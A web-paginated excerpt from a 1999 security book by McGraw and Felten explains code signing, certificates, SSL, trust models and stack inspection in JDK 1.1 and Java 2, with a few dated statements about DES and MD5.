We want to grant each applet or application the minimum privileges it needs. Rather than assigning a given applet's entire collection of privileges to all of its classes, we want each class to get just what it needs. We want a class's privileges to be "turned off" except for brief periods of time. We even want to reduce the privileges of some of the built-in system classes.
The third objective is manageability. This is a tricky one. Some might think that the ultimate in management power is when all possible options are presented to the user. (Power users, developers, and other gurus tend to think along these lines.) But in reality, users are overwhelmed and irritated when they are confronted with too many big complicated dialog boxes. Somehow the choices must be boiled down so that users get just the control they need without being asked any unnecessary questions. As we see in the rest of this chapter, the Java security model is still a work in progress. Nobody knows yet how to achieve all of these goals, or even how they trade off against each other. Today's models are pretty good, but they are a far cry from perfect.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Beyond the Sandbox: Signed Code and Java 2 CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 2 -- Security Enhancements in JDK 1.1
Next Page
JDK 1.1 appeared in the early Spring of 1997 and included a number of improvements and changes to the base Java security model of JDK 1.0.2. Fortunately, none of the material about the base Java security model covered in the last chapter (or for that matter, things you learned from the previous edition of this book) was outdated or replaced; rather, the Java security architecture was changed through a process of enhancement and addition. From a security perspective, the most important changes introduced in JDK 1.1 were the addition of authentication and simple access-control mechanisms that rely on the use of cryptography. Remember, security is much more than just cryptography. Think of cryptography as a means to an end-an important part of the puzzle, but only a part. A side effect of the need for cryptographic functionality inside the model itself was the creation of a crypto API. The crypto API, also introduced with JDK 1.1, provides a basic toolkit of cryptography algorithms that developers can use in their programs.
The Crypto API Today, Java includes a cryptography toolkit that includes both an API and some packages implementing a portion of the functionality behind the API. Classes in the java.security package, the package implementing the cryptographic functionality, have a dual purpose. One purpose is to provide the cryptographic methods that Java's designers used to implement the JDK 1.1 and Java 2 security models. The second purpose is to provide cryptography functionality to Java developers charged with creating secure applications. Parts of a crypto API were released with JDK 1.1. The parts included both one-way hash functions and
digital signature capability. DES encryption tools were released only as an extension to North American users. Encryption tools and their mathematically related cousins (such as digital signing) change the way Java use policies are managed. Digital signatures, which are discussed next, make it possible to authenticate who has vouched for a piece of code, and potentially check it for tampering. If you decide to trust a particular person, you can set things up so that you automatically trust programs that person signs. (Note that with the right tools, anyone can sign any piece of code. Whether or not a piece of code is written, released, or supported by the person who signed it is not something digital signatures can tell you.) Because the signature is a mechanism for vouching and spreading trust around, if you trust some experts in the field who agree to approve Java programs based on their analysis, you can trust any code that they sign as well. Digital signing paves the way for a true community of trust to develop. We think digital signing is important enough to warrant an entire section itself. See page 88. Beyond digital signatures, the crypto API released with JDK 1.1 includes a couple of other capabilities. One-way hash functions provide a way to fingerprint a program or data so that you can verify that it has not been changed since being created. Fingerprinting hash functions such as MD5 and SHA make distribution over the Net easier to swallow. If you are certain that a program you are downloading from the Net is the original program (and not a Trojan Horse masquerading as the original), you will probably be more likely to use it. Many archives on the Web today make use of MD5. Fingerprinting, also called message digesting, works by performing a one-way hash over a series of bytes. Given a program (which is really just a bunch of ones and zeros), it is possible to compute a hash that ends up being many times smaller than the original program, but (hopefully) represents only that program. The main trick is to avoid collisions, whereby the same fingerprint is computed for different programs, and to come up with a hash function that can't be run in the opposite direction. MD5 and SHA are systems for computing one-way hashes over a binary file. The crypto API provides a way for Java programs to include this functionality. MD5 and SHA are useful when it comes to signing code because the act of signing is actually a complicated function of a secret crypto key and the data to be signed. The math is hairy enough that it is a much better idea to compute it using a program's hash instead of the program itself. Remember, the hash is many times smaller than the program it represents. Figure 3.1 shows the important role that one-way hash functions play in code signing.
Figure 3.1 How code is digitally signed (A) and digital signatures are verified (B). (A) Signing code takes several distinct operations: (1) a one-way hash calculation is run on a piece of binary code, resulting in a small "thumbprint" of the code; (2) the hash is signed using the signer's private key; (3) the signed hash and the original binary code are placed together (potentially along with other signed and unsigned code) in an archive JAR. Now the JAR can be shipped around as mobile code. (B) Validating signed code also takes several steps: (1) a piece of binary code and its associated signed hash are removed from the JAR; (2) a new hash is calculated using the same one-way hash algorithm that the signer used to create the signed hash; (3) the signature carried by the signed hash is cryptographically validated with the signer's public key (possibly with reference to certificate authorities and trust chains); (4) if the signature checks out, the now decrypted original hash is available for comparison with the new hash. Though all three Java code signing schemes (Sun, Microsoft, and Netscape) share these two processes, there are enough differences that the systems do not inter-operate. See Appendix C for examples of how to sign Java code under each implementation.
Another function that appeared as part of the crypto API (at least in the package available only in the United States, and known as the Java Cryptography Extension, or JCE) was DES encryption. DES, an
acronym for Digital Encryption Standard, is a venerable old encryption algorithm that can in some cases be deciphered (given enough effort and a small enough key). DES is certainly much more secure than plain text, but does not provide the best available security. In 1998, the EFF created a special-purpose machine to crack DES messages. The purpose of the machine was to emphasize just how vulnerable DES really is. (For more on the DES cracker, see www.eff.org/descracker/.) Most Unix machines use a variant of DES to encrypt user passwords stored in the /etc/passwd file. If 56bit (or smaller) keys are used for DES, then the U.S. government will allow its export and use outside the United States. There is also a variant called triple DES that effectively has a 112-bit key, which will be safe against brute-force searching for a long time. The ease of "breaking'' DES is directly related to the length of its key.
Certificates Another feature that appeared in JDK 1.1 is certificate technology based on the X.509v3 open standard. Certificates provide an authentication mechanism by which one site can securely recognize another. Sites that recognize each other have an opportunity to trust each other as well. When a secure socket layer (SSL) connection initializes between two machines, they handshake by exchanging certificates. SSL is discussed in the next section. A certificate is a piece of identification (credential) much like a driver's license. Information stored inside a typical certificate file includes the subject's name, the subject's public key, the certificate's issuer, the issuer's digital signature, an expiration date, and a serial number. So the question is, who gives out these certificates? Someone (or some thing) called a certification authority (CA). There are a handful of companies that have set themselves up as CAs in the world. These include Netscape, GTE, Verisign, and a few others. But why should you trust them? Good question. (See page 92.)
Secure Communication Java 2 now includes a package for secure socket layer (SSL) communication. Similar to Netscape's SSL, the Java SSL provides a secure communications channel by using encryption. SSL works by providing a mechanism for encrypting packets on the sending end, sending them over an untrusted channel, and decrypting them at the receiving end. SSL is useful for many business applications, including the transmission of proprietary information and electronic currency. Most Web servers and browsers now support SSL, allowing a browser to communicate with a Web server
without anyone else overhearing the conversation. (Well, an outsider might overhear a conversation, but he or she certainly won't understand it.) Though SSL is commonly used over the Web, it can actually be used to protect virtually any sort of network transaction. Most browsers support SSL by providing a "Secure HTTP Connection" service that looks to the user just like a normal Web connection, but uses SSL underneath. This allows you to reap the benefits of SSL without having to learn anything except how the browser tells you whether a connection is secure. The encryption technology underlying SSL is generally believed to be secure, but there are two potential problems. First, the U.S. government restricts the export of strong cryptography software. If your browser version includes dumbed-down exportable cryptography software, your communications might not be as secure as you think. Second, SSL is good at providing secure communications, but it is not as good at establishing who you are communicating with. This leads into all the problems of authentication and key distribution discussed on page 90.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Beyond the Sandbox: Signed Code and Java 2 CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 3 -- Signed Code
The capability to digitally sign Java byte code (at least byte code files placed in a Java archive, called a JAR file) was introduced with JDK 1.1 and greatly expanded with Java 2. Digital signing capability is an important part of the new Java security regimen. This is exciting because digital signing radically alters the amount of trust you can place in a piece of code. A Tutorial on signing Java code with the current tools from Microsoft, Netscape, and Sun can be found in Appendix C. One particular kind of cryptography tool allows a chunk of digital information (including, of course, Java byte code) to be signed by a person or organization. See Figure 3.1. Because a digital signature has special mathematical properties, it is difficult to forge. Your browser can verify a signature, allowing you to be fairly certain that a particular person or organization vouches for the code. That means you can instruct your browser always to accept applets signed by some party that you trust, or always to reject applets signed by some party that you don't trust. Same thing goes for a nonbrowser-based VM, which can be instructed (through policy) how to treat application code signed by particular entities. It is important to recognize that even if you know exactly which Web pages you are visiting and who created them, you probably don't know who wrote each applet that appears on the pages you visit. Applets are shuffled around on the Net like Beanie Babies in a fifth-grade classroom. Contrary to popular belief, you don't always know where information is coming from on the Internet. A nasty attack called IP spoofing allows a bad guy to send you network traffic that claims to come from someplace else. For instance, you might think the traffic is coming from "whitehouse.gov", when it's really coming from "cracker.org". IP spoofing used to be considered just a theoretical possibility, but it has actually happened in recent years. The best-known example is an attack by the infamous cracker Kevin Mitnick on a machine managed by computer security worker Tsutomu Shimomura. Mitnick's attack led to his eventual capture and conviction [Shimomura and Markoff, 1996]. An attack known as Web spoofing shows that even in the absence of IP spoofing, it is not always clear that
you are visiting the site you may think you're visiting [Felten, et al., 1997]. An attacker can lure you into a "false Web" that looks just like the real one, except that the attacker can see everything you do, including anything you type into a form, and the attacker can modify the traffic between you and any Web server. All of this is possible even if your browser tells you that you have a "secure" connection. See Figure 3.2.
Figure 3.2 A Web Spoofing attack can be carried out with extensive use of a browser's mobile code capability. The Princeton Team has implemented a demonstration of Web Spoofing that makes extensive use of JavaScript. Once an attacker has lured the victim to the attack server (shown as www.attacker.org), the attacker can control the victim's view of the Web by acting as a rewriting proxy. Clever use of JavaScript makes all changes invisible to the victim and can even appear to offer encrypted traffic.
Even if you ignore the possibility of spoofing, using the return address of an applet (that is, knowing the Web site where you got the applet code) still isn't good enough to base a trust decision on. A digital signature holds much more information. For example, such a signature could tell you that although the applet is being redistributed by a site you don't trust, it was originally signed by someone you do trust. Or it can tell you that although the applet was written and distributed by someone you don't know, your friend has signed the applet, attesting that it is safe. Or perhaps it can simply tell you which of the thousands of users at aol.com signed the applet.
Digital Signatures So how do you sign a piece of code? The key to certification and authentication is the use of digital signatures. The idea is simple: to provide a way for people to sign electronic documents so that these signatures can be used in the same way we use signatures on paper documents. In order to be useful, a digital signature should satisfy five properties [Schneier, 1995]. It should be:
1. 2. 3. 4.
Verifiable: Anyone should be able to validate a signature. Unforgeable: It should be impossible for anyone but you to attach your signature to a document. Nonreusable: It should be impossible to "lift'' a signature off one document and attach it to another. Unalterable: It should be impossible for anyone to change the document after it has been signed, without making the signature invalid. 5. Nondeniable: It should be impossible for the signer to disavow the signature once it is created. Mathematicians and computer scientists have devised several digital signature schemes that appear to work quite well. The full details are very technical. If you're interested in learning more about such schemes, Bruce Schneier's excellent book, Applied Cryptography, is a good place to start [Schneier, 1995]. The digital signatures used for Java code are based on public-key cryptography. If Alice wants to be able to sign documents, she must first use a special mathematical technique to generate two large numbers: her own private key, and her public key. As the names suggest, Alice keeps her private key to herself. Keeping it secret is essential. Her public key, however, is announced to the world. Alice's private key is used for signing electronic documents. Her public key is used to verify those signatures. See Figure 3.1. Anyone who knows the private key (hopefully only Alice!) can run a special computation involving the document and Alice's private key. The result of this process is a digitally signed version of the document. Anyone who knows Alice's public key can verify her signature by running a special computation involving the signed document and Alice's public key. Since only Alice knows the private key, she is the only one who can put her signature on documents. Since everyone knows her public key, anyone can verify that the signature is hers. Everything sounds great. You tell your browser to trust applets signed by Alice by registering Alice's public key. Whenever applets claim to come from Alice, the browser can verify that claim by comparing the registered public key to the signed applet. If the applet is not from Alice, it can be rejected.
Key Distribution But how do you know what Alice's public key is? If you know Alice, she can call you on the phone and tell you her public key. In this case, you will know the key is valid because you recognize Alice's voice. This doesn't work if you don't know Alice. How do you know the person on the other end of the phone is Alice? Maybe it's Alice's evil twin Zelda, trying to pass off Zelda's public key as Alice's so she can forge Alice's signature.
One way around this problem is to ask Alice's twin brother Allan to help. Alice can create a document containing her public key and have Allan sign that document. If you trust Allan and you know Allan's public key, then the document tells you reliably what Alice's public key is. But how do you know Allan's public key? You can't ask Alice and Allan to vouch for each other's public keys, because Zelda could create a false Alice key and a false Allan key and use them to sign documents vouching for each other! This leaves us stuck with a chicken-and-egg problem. The usual solution is to use a certification authority (CA). The CA, Claire in our example, is in the business of certifying keys. Alice goes to the CA's office with her birth certificate, passport, driver's license, and DNA sample. Once she has convinced Claire that she really is Alice, she tells Claire her public key, and Claire signs an electronic document that contains Alice's public key. That document serves as an electronic credential for Alice. After Alice has a credential, key distribution is much easier. Alice can plaster copies of her credential everywhere: on bulletin boards, on her homepage, and at the end of every email message she sends. Better yet, whenever Alice signs a document, she can attach a copy of her credential to the signed document. On receiving the document, you can first check the credential by verifying Claire's signature, and then verify Alice's signature using the public key included with the document. Zelda can't trick you into accepting a bogus public key for Alice, because she can't forge Claire's signature. Figure 3.3 shows the process by which a signature on a piece of signed code can be validated.
Figure 3.3 Validating a signature on signed code. In this example, a piece of code is signed by the private key of thing1. The corresponding public key, available on thing1's certificate can be used to validate the signature carried by the code. For added security and to make key management more reasonable, browsers typically validate the CA signature carried on the certificate.
The beauty of this approach is that if everyone can visit Claire and get a credential, then no one has to remember any keys except for his or her own private key (to sign documents), and Claire's public key (to verify credentials). There are still two problems, though. Everyone must trust Claire. As the authority, she can impersonate anyone. And you still need a reliable way to get Claire's public key. It doesn't help to have Claire get a credential from Claire's mom, Elena. You would have no more reliable way of knowing who Elena is.
There is no technological solution to this. Claire's key will probably be hard-wired into your browser software, or entered by support staff at install time. As long as you get a valid copy of the browser, and no one has messed with your hard disk, everything will be okay. How do you know you have a valid copy of the browser? It will be signed by the browser vendor. How do you know the browser vendor's signature is valid? Don't ask-there lies madness.
What Signing Can't Do Even if the signing and signature-checking mechanisms work perfectly and are able to reveal who signed each applet, a huge unsolved problem still remains. Technology can tell you who signed an applet, but it can't tell you whether that person is trustworthy. That's a decision you have to make based on human judgment. And you'd better make the right decision.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Beyond the Sandbox: Signed Code and Java 2 CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 4 -- Trust
Once a code signing infrastructure is in place, you will be able to know reliably who vouches for each Java program. The next link in the chain is figuring out what to do with that knowledge. One thing you can certainly do is to relax Java's security rules for applets that you trust. For example, with the default sandbox Java normally prohibits any access to files in order to prevent an applet from corrupting your hard drive or reading your private data. If you trust applets from particular sources, though, you might want to allow them to read files. Introducing permissions granted according to trust level opens up vast new application areas, including things like spreadsheet applets, games with stored high scores, Web sites that recall your preferences, a host of different remote management possibilities, and so on. Besides access to files, there are many other capabilities you might want to grant a trusted applet or application: access to your machine's microphone and camera, freedom to make network connections, and maybe even freedom to label other code as trusted. It all depends on your decision to trust and how much to trust a signed program. There are several ways you can make these decisions.
Who Do You Trust? The first decision is whether to use a black-and-white or a shades-of-gray policy. A black-and-white policy is one that divides all programs into two groups: trusted and untrusted. This was the only sort of trust policy that was easy to implement using JDK 1.1. Java 2, however, changed all that. Java 2 makes it possible to create a shades-of-gray policy, allowing you to assign any degree of partial trust to a Java program. (Recall Figure 1.6 in Chapter 1.)
Before Java came along, most Internet software worked on a black-and-white model. If someone offered to let you download a program, you had two choices: either you downloaded the program or you didn't. If you did, you were trusting the program completely since there was nothing to stop it from running wild on your machine. If you didn't download the program, you were treating it as completely untrusted. Java, with its security policies as implemented in the base sandbox, changed the rules a bit by making it easier to decide what to download in the first place. If an untrusted applet can't bite you, you might as well check it out. The black-and-white model is sometimes called the shrink-wrap model because it's similar to software you purchase. If you buy a software package from a reputable software store, you can reasonably assume that the software is safe to load on to your machine. People who use the term shrink-wrap model tend to assume that no one would ever want to run software that wasn't written by a large software company. We don't agree with that implication, so we'll stick with the term black-and-white. It might seem that the shades-of-gray model is better than the black-and-white model, because black-andwhite only allows you to label programs as completely trusted or completely untrusted. On the other hand, shades-of-gray gives you more choices. You may still label an applet as completely trusted or completely untrusted if you wish. Choices are not always good, as anyone who has encountered the cereal aisle of a large supermarket can attest. Making choices takes up time that you would probably rather spend doing something else. Frequent decision-making saps your attention span, so you are more likely to make a mistake, thus opening yourself up to attack. Finally, having more options saddles your browser with more complicated record-keeping duties to keep track of all of your decisions. This extra complexity might lead to bugs in the browser, possibly jeopardizing security yet again. Which model is better, black-and-white or shades-of-gray? It depends on how people react to the two systems, which is hard to predict. Mostly likely, competing browsers will offer different models, and the models will fight it out in the marketplace. The decision is ultimately one of user preference.
Free the Trusted Code! Once you've decided who to trust, the next issue is what you allow trusted programs to do. If you're using the black-and-white model, then you have to decide whether to allow untrusted programs, like applets off unknown Web sites, to run at all. You also have to decide what extra capabilities, if any, you want to give to trusted programs. You might decide to let trusted programs do whatever they want, with no restrictions at all. Or you might decide to run trusted programs under the restrictive Java security rules of JDK 1.0.2. The choices depend on your taste for risk, and what kinds of programs you want to run. With black-andwhite security, however, all the programs you trust receive the same level of trust. If you're using a shades-of-gray model, you face more choices. You may decide on a program-by-program
(or signer-by-signer) basis exactly which capabilities to grant. Rather than presenting you with a huge laundry list of possible capabilities for each program and forcing you to tick items off the list, a good browser will probably provide a way for you to grant certain prepackaged sets of capabilities. For example, there might be a set of permissions for videoconferencing applets, which would include things like permission to use the camera, the microphone, the speaker, the display, and networking access. Perhaps there would be another set of document-editing applet permissions, which would include filecreation, file-reading, and file-modification capabilities. There are two basic ways to group the mapping of program (or programs) to permission (or permissions). Microsoft's Authenticode system, introduced in Chapter 1, defines security zones, which are ways of grouping programs together. For example, all programs from a company intranet signed by the system administrator's key might comprise a zone. (These zones might well involve multiple keys and origins.) Policies can then be defined on a per-zone basis. Netscape defines macro targets, which are groups of permissions (as sketched in the previous paragraph). For example, a macro target might be called "typical game privileges" and define the permissions typically needed by a network-enabled game. Sun has a system of implication in which permission for code to use one resource can imply permission to use another resource. In their model, each resource is required to define an implies() method that can be used to ask a resource whether it implies a particular other permission. (More detail is provided later in this chapter.) All of these are examples of grouping signers or privileges together and treating the group as a unit. Grouping is generally a good idea in security management because it reduces the number of decisions that the user (or other policy-maker) faces. Fewer decisions means more attention paid to each decision and hence, better decisions. JDK 1.1, which introduced the concept of a signed applet, provides a black-and-white model. A digitally signed applet can be treated as trusted local code as long as the signature key is recognized as trusted by the system finally running the code. Java 2 provides a shades-of-gray model.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Beyond the Sandbox: Signed Code and Java 2 CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 5 -- An Introduction to Java 2 Security
Next Page
Signatures alone don't provide the infrastructure needed to allow Java code out of the sandbox gradually. Access control mechanisms are required as well. In JDK 1.1, for example, applet code signed by a trusted party can be treated as trusted local code, but not as partially trusted code (without an inordinate amount of extra programming). There is no notion of access control beyond the one-and-only trust decision made per class. That means in practice, JDK 1.1 offers a black-and-white trust model much like ActiveX (although with the clear advantage that untrusted code must stay in the sandbox). The new security architecture in Java 2 has four central capabilities [Gong and Schemers, 1998]: Fine-grained access control: The ability to specify that code with proper permissions is allowed to step outside the sandbox constraints gradually (for example, an applet signed by a trusted key might be allowed to open arbitrary network connections). Configurable security policy: The ability for application builders and Java users to configure and manage complex security policies. Extensible access control structure: The ability to allow typed permissions and to group such permissions in logical, policy-oriented constructs. Security checks for all Java programs: A departure from the concept that built-in code should be completely trusted. (It is this capability that serves to erase the once-important distinction between applets and applications.) It is important to note that the first three of these four capabilities are not really new to Java. Java is a
powerful programming language, and it has always been possible to implement complex, configurable, extensible security policies based on fine-grained access control. It was just exceptionally tricky. Java 2 serves to make this task possible for mere mortals.
A View from 50,000 Feet At its heart, the Java 2 security model has a simple idea: Make all code run under a security policy that grants different amounts of privilege to different programs. While the idea may be simple, in practice, creating a coherent policy is quite difficult. Figure 3.4 shows the role that mobile code identity and policy play in Java 2.
Figure 3.4 Mobile code in Java 2 interacts with user defined policy through the AccessController. Byte code may make calls to potentially-dangerous functionality. When such calls are made, the AccessController (new to Java 2) consults policy and uses stack inspection to decide whether to allow or disallow a call. Decisions are based on the identity of the code.
Java 2 code running on the new Java VMs can be granted special permissions and have its access checked against policy as it runs. The cornerstone of the system is policy (something that will not surprise security practitioners in the least). Policy can be set by the user (usually a bad idea) or by the system administrator, and is represented in the class java.security.Policy. Herein rests the Achilles' Heel of Java 2 security. Setting up a coherent policy at a fine-grained level takes experience and security expertise. Today's harried system administrators are not likely to enjoy this added responsibility. On the other hand, if policy management is left up to users, mistakes are bound to be made. Users have a tendency to prefer "cool" to "secure." (Recall the dancing pigs of Chapter 1.) Executable code is categorized based on its URL of origin and the private keys used to sign the code. The security policy maps a set of access permissions to code characterized by particular origin/signature information. Protection domains can be created on demand and are tied to code with particular CodeBase and SignedBy properties. If this paragraph confuses you, imagine trying to create and manage a coherent mobile code security policy!
Code can be signed with multiple keys and can potentially match multiple policy entries. In this case, permissions are granted in an additive fashion.
A Simple Example An easy example of how this works in practice is helpful. First, imagine a policy representing the statement "code from "www.rstcorp.com/" applet signed by 'self' is given permission to read and write files in the directory /applet/tmp and connect to any host in the rstcorp.com domain." Next, a class that is signed by "self" and that originates from "www.rstcorp.com/" applet arrives. As the code runs, access control decisions are made based on the permissions defined in the policy. The permissions are stored in permission objects tracked by the Java runtime system. Technically, access control decisions are made with reference to the runtime call stack associated with a thread of computation (more on this later).
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Beyond the Sandbox: Signed Code and Java 2 CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 6 -- Access Control and Stack Inspection
Next Page
The idea of access control is not a new one in computer security. For decades, researchers have built on the fundamental concept of grouping and permissions. The idea is to define a logical system in which entities known as principals (often corresponding one to one with code owned by users or groups of users) are authorized to access a number of particular protected objects (often system resources such as files). To make this less esoteric, consider that the familiar JDK 1.0.2 Java sandbox is a primitive kind of access control. In the default case, applets (which serve as principals in our example) are allowed to access all objects inside the sandbox, but none outside the sandbox. So what we're talking about here is a way of setting up logical groupings. Then we can start talking about separating groups from each other and granting groups particular permissions. Security is all about separation. Readers familiar with the Unix or NT file system will see clear similarities to the notion of user IDs and file permissions. Sometimes a Java application (like, say, a Web browser) needs to run untrusted code within itself. In this case, Java system libraries need some way of distinguishing between calls originating in untrusted code and calls originating from the trusted application itself. Clearly, the calls originating in untrusted code need to be restricted to prevent hostile activities. By contrast, calls originating in the application itself should be allowed to proceed (as long as they follow any security rules that the operating system mandates). The question is, how can we implement a system that does this? Java implements such a system by allowing security-checking code to examine the runtime stack for frames executing untrusted code. Each thread of execution has its own runtime stack (see Figure 3.5). Security decisions can be made with reference to this check. This is called stack inspection [Wallach, et al., 1997]. All the major vendors have adopted stack inspection to meet the demand for more flexible security policies than those originally allowed under the old sandbox model. Stack inspection is used by
Netscape Navigator 4.0, Microsoft Internet Explorer 4.0, and Sun Microsystems' Java 2. (Interestingly, Java is thus the most widespread use of stack inspection for security ever. You can think of it as a very big security-critical experiment.)
Figure 3.5 Each Java program thread includes a runtime stack that tracks method calls. The purpose of the stack is to keep track of which method calls which other method in order to be able to return to the appropriate program location when an invoked method has finished its work. The stack grows and shrinks during typical program operation. Java 2 inspects the stack in order to make access control decisions. In this example, each stack frame includes both a method call and a trust label (T for trusted, U for untrusted).
Simple Stack Inspection Netscape 3.0's stack-inspection-based model (and every other black-and-white security model) is a simple access control system with two principals: system and untrusted. Just to keep things simple, the only privilege available is full. In this model, every stack frame is labeled with a principal (system if the frame is executing code that is part of the VM or the built-in libraries and untrusted otherwise). Each stack frame also includes a flag that specifies whether privilege is full. A system class can set this flag, thus enabling its privilege. This need only be done when something dangerous must occur-something that not every piece of code should be allowed to do. Untrusted code is not allowed to set the flag. Whenever a stack frame completes its work, its flag (if it has one) disappears. Every method about to do something potentially dangerous is forced to submit to a stack inspection. The
stack inspection is used to decide whether the dangerous activity should be allowed. The stack inspection algorithm searches the frames on the caller's stack in sequence from the newest to the oldest. If the search encounters an untrusted stack frame (which as we know can never get a privilege flag) the search terminates, access is forbidden, and an exception is thrown. The search also terminates if a system stack frame with a privilege flag is encountered. In this case, access is allowed (see Figure 3.6).
Figure 3.6 Two examples of simple stack inspection. Each stack is made of frames with three parts: a privilege flag (where full privilege is denoted by an X), a principal entry (untrusted or system), and a method. In STACK A, an untrusted applet is attempting to use the url.open() method to access a file in the browser's cache. The VM makes a decision regarding whether to set the privilege flag (which it does) by looking at the parameters in the actual method invocation. Since the file in this case is a cache file, access is allowed. In short, a system-level method is doing something potentially-dangerous on the behalf of untrusted code. In STACK B, an untrusted applet is also attempting to use the url.open() method, however in this case, the file argument is not a browser cache file but a normal file in the filesystem. Untrusted code is not allowed to do this, so the privilege flag is not set by the VM and access is denied.
Real Stack Inspection The simple example of stack inspection just given is only powerful enough to implement black-and-white trust models. Code is either fully trusted (and granted full permission at the same level as the application) or untrusted (and allowed no permission to carry out dangerous operations). However, what we want is the ability to create a shades-of-gray trust model. How can we do that? It turns out that if we generalize the simple model we get what we need. The first step is to add the ability to have multiple principals. Then we need to have many more specific permissions than full. These two capabilities allow us to have a complex system in which different principals can have different degrees of permission in (and hence, access to) the system. Research into stack inspection shows that four basic primitives are all that are required to implement a real stack inspection system. In particular, see Dan Wallach's Ph.D. thesis at Princeton and the paper Understanding Java Stack Inspection [Wallach and Felten, 1998]. Each of the major vendors uses different names for these primitives, but they all boil down to the same four essential operations (all explained more fully in the following discussions):
enablePrivilege() disablePrivilege() checkPrivilege() revertPrivilege()
Some resources such as the file system or network sockets need to be protected from use (and possible abuse) by untrusted code. These resources are protected by permissions. Before code (trusted or otherwise) is allowed access to one of these resources, say, R, the system must make sure to call checkPrivilege(R). If you recall our discussion of the Security Manager from the previous chapter, you'll remember that the Java libraries are set up in such a way that dangerous operations must go through a Security Manager check before they can occur. As we said, the Java API provides all calls necessary to implement a virtual OS, thus making isolation of all required security checks possible within the API. When a dangerous call is made to the Java API, the Security Manager is queried by the code defining the base classes. The checkPrivilege() method is used to help make behind-the-scenes access control decisions in a very similar fashion. To achieve backwards compatibility, the Security Manager can be implemented using the four stack inspection primitives. When code wants to make use of some resource R, it must first call enablePrivilege(R). When this method is invoked, a check of local policy occurs that determines whether the caller is permitted to use R. If the use is permitted, the current stack frame is annotated with an enabled-privilege(R) mark. This allows the code to use the resource normally. Permission to use the resource does not last forever; if it did, the system would not work. There are two ways in which the privilege annotation is discarded. One way is for the call to return. In this case, the annotation is discarded along with the stack frame. The second way is for the code to make an explicit call to revertPrivilege(R) or disablePrivilege(R). The latter call creates a stack annotation that can hide an earlier enabled privilege. The former simply removes annotations from the current stack frame. All three major Java vendors implement a very similar (and simple) stack inspection algorithm. A generalization of this algorithm, after Wallach, is shown in Listing 3.1 [Wallach and Felten, 1998]. The algorithm searches stack frames on the caller's stack in order from newest to oldest. If the search finds a stack frame with the appropriate enabled-privilege annotation, it terminates, allowing access. If the search finds a stack frame that is forbidden from accessing the target by local policy, or has explicitly disabled its privileges, the search terminates, forbidding access. It may seem strange that the vendors take different actions when the search reaches the end of the stack without meeting any of the conditions (sometimes called falling off the end of the stack). Netscape denies permission, while both Microsoft and Sun allow permission. This difference has to do with backward compatibility. The Netscape choice causes legacy code to be treated like an old-fashioned applet, and
confined to the sandbox. The Microsoft/Sun choice allows a signed Java application to use its privileges even without explicitly marking its stack frames, thus making it easy to migrate existing applications. Since Netscape did not support applications, they felt no need to follow the Microsoft/Sun approach and instead chose the more conservative course of denying permission. For more implementation detail on the three vendors' different code signing schemes, see Appendix C.
Formalizing Stack Inspection Members of Princeton's Secure Internet Programming team (in particular, Dan Wallach and Edward Felten) have created a formal model of Java's stack inspection system in a belief logic known as ABPL (designed by Abadi, Burrows, Lampson, and Plotkin) [Abadi, et al., 1993]. Using the model, the Princeton team demonstrates how Java's access control decisions correspond to proving statements in ABPL. Besides putting Java's stack inspection system on solid theoretical footing, the work demonstrates a very efficient way to implement stack inspection systems as pushdown automata using security-passing style. Interested readers should see [Wallach and Felten, 1998], which is available through the Princeton Web site at cs.princeton.edu/sip/pub/oakland98.html. A more recent paper on how to implement stack inspection more efficiently is also available on the Princeton site.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Beyond the Sandbox: Signed Code and Java 2 CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 7 -- New Security Mechanisms in Sun's Java 2
Next Page
Now that we have covered the basic concepts and the underlying mechanisms of Java 2 security, we can delve into the details of the system. Essential mechanisms include many of the things we have already discussed: identity, permissions, implies, policy, protection domains, access control, and privilege. Sources for the information presented here include [Gong, et. al., 1997; Gong and Schemers, 1998]. This section describes Sun's version of stack inspection. Netscape and Microsoft each have their own version, but we decided to forgo a lengthy discussion of all three systems. Though the vendors claim they are very different, we think the three systems are really quite similar. Perhaps one day they will all converge, making developers' and managers' lives much easier.
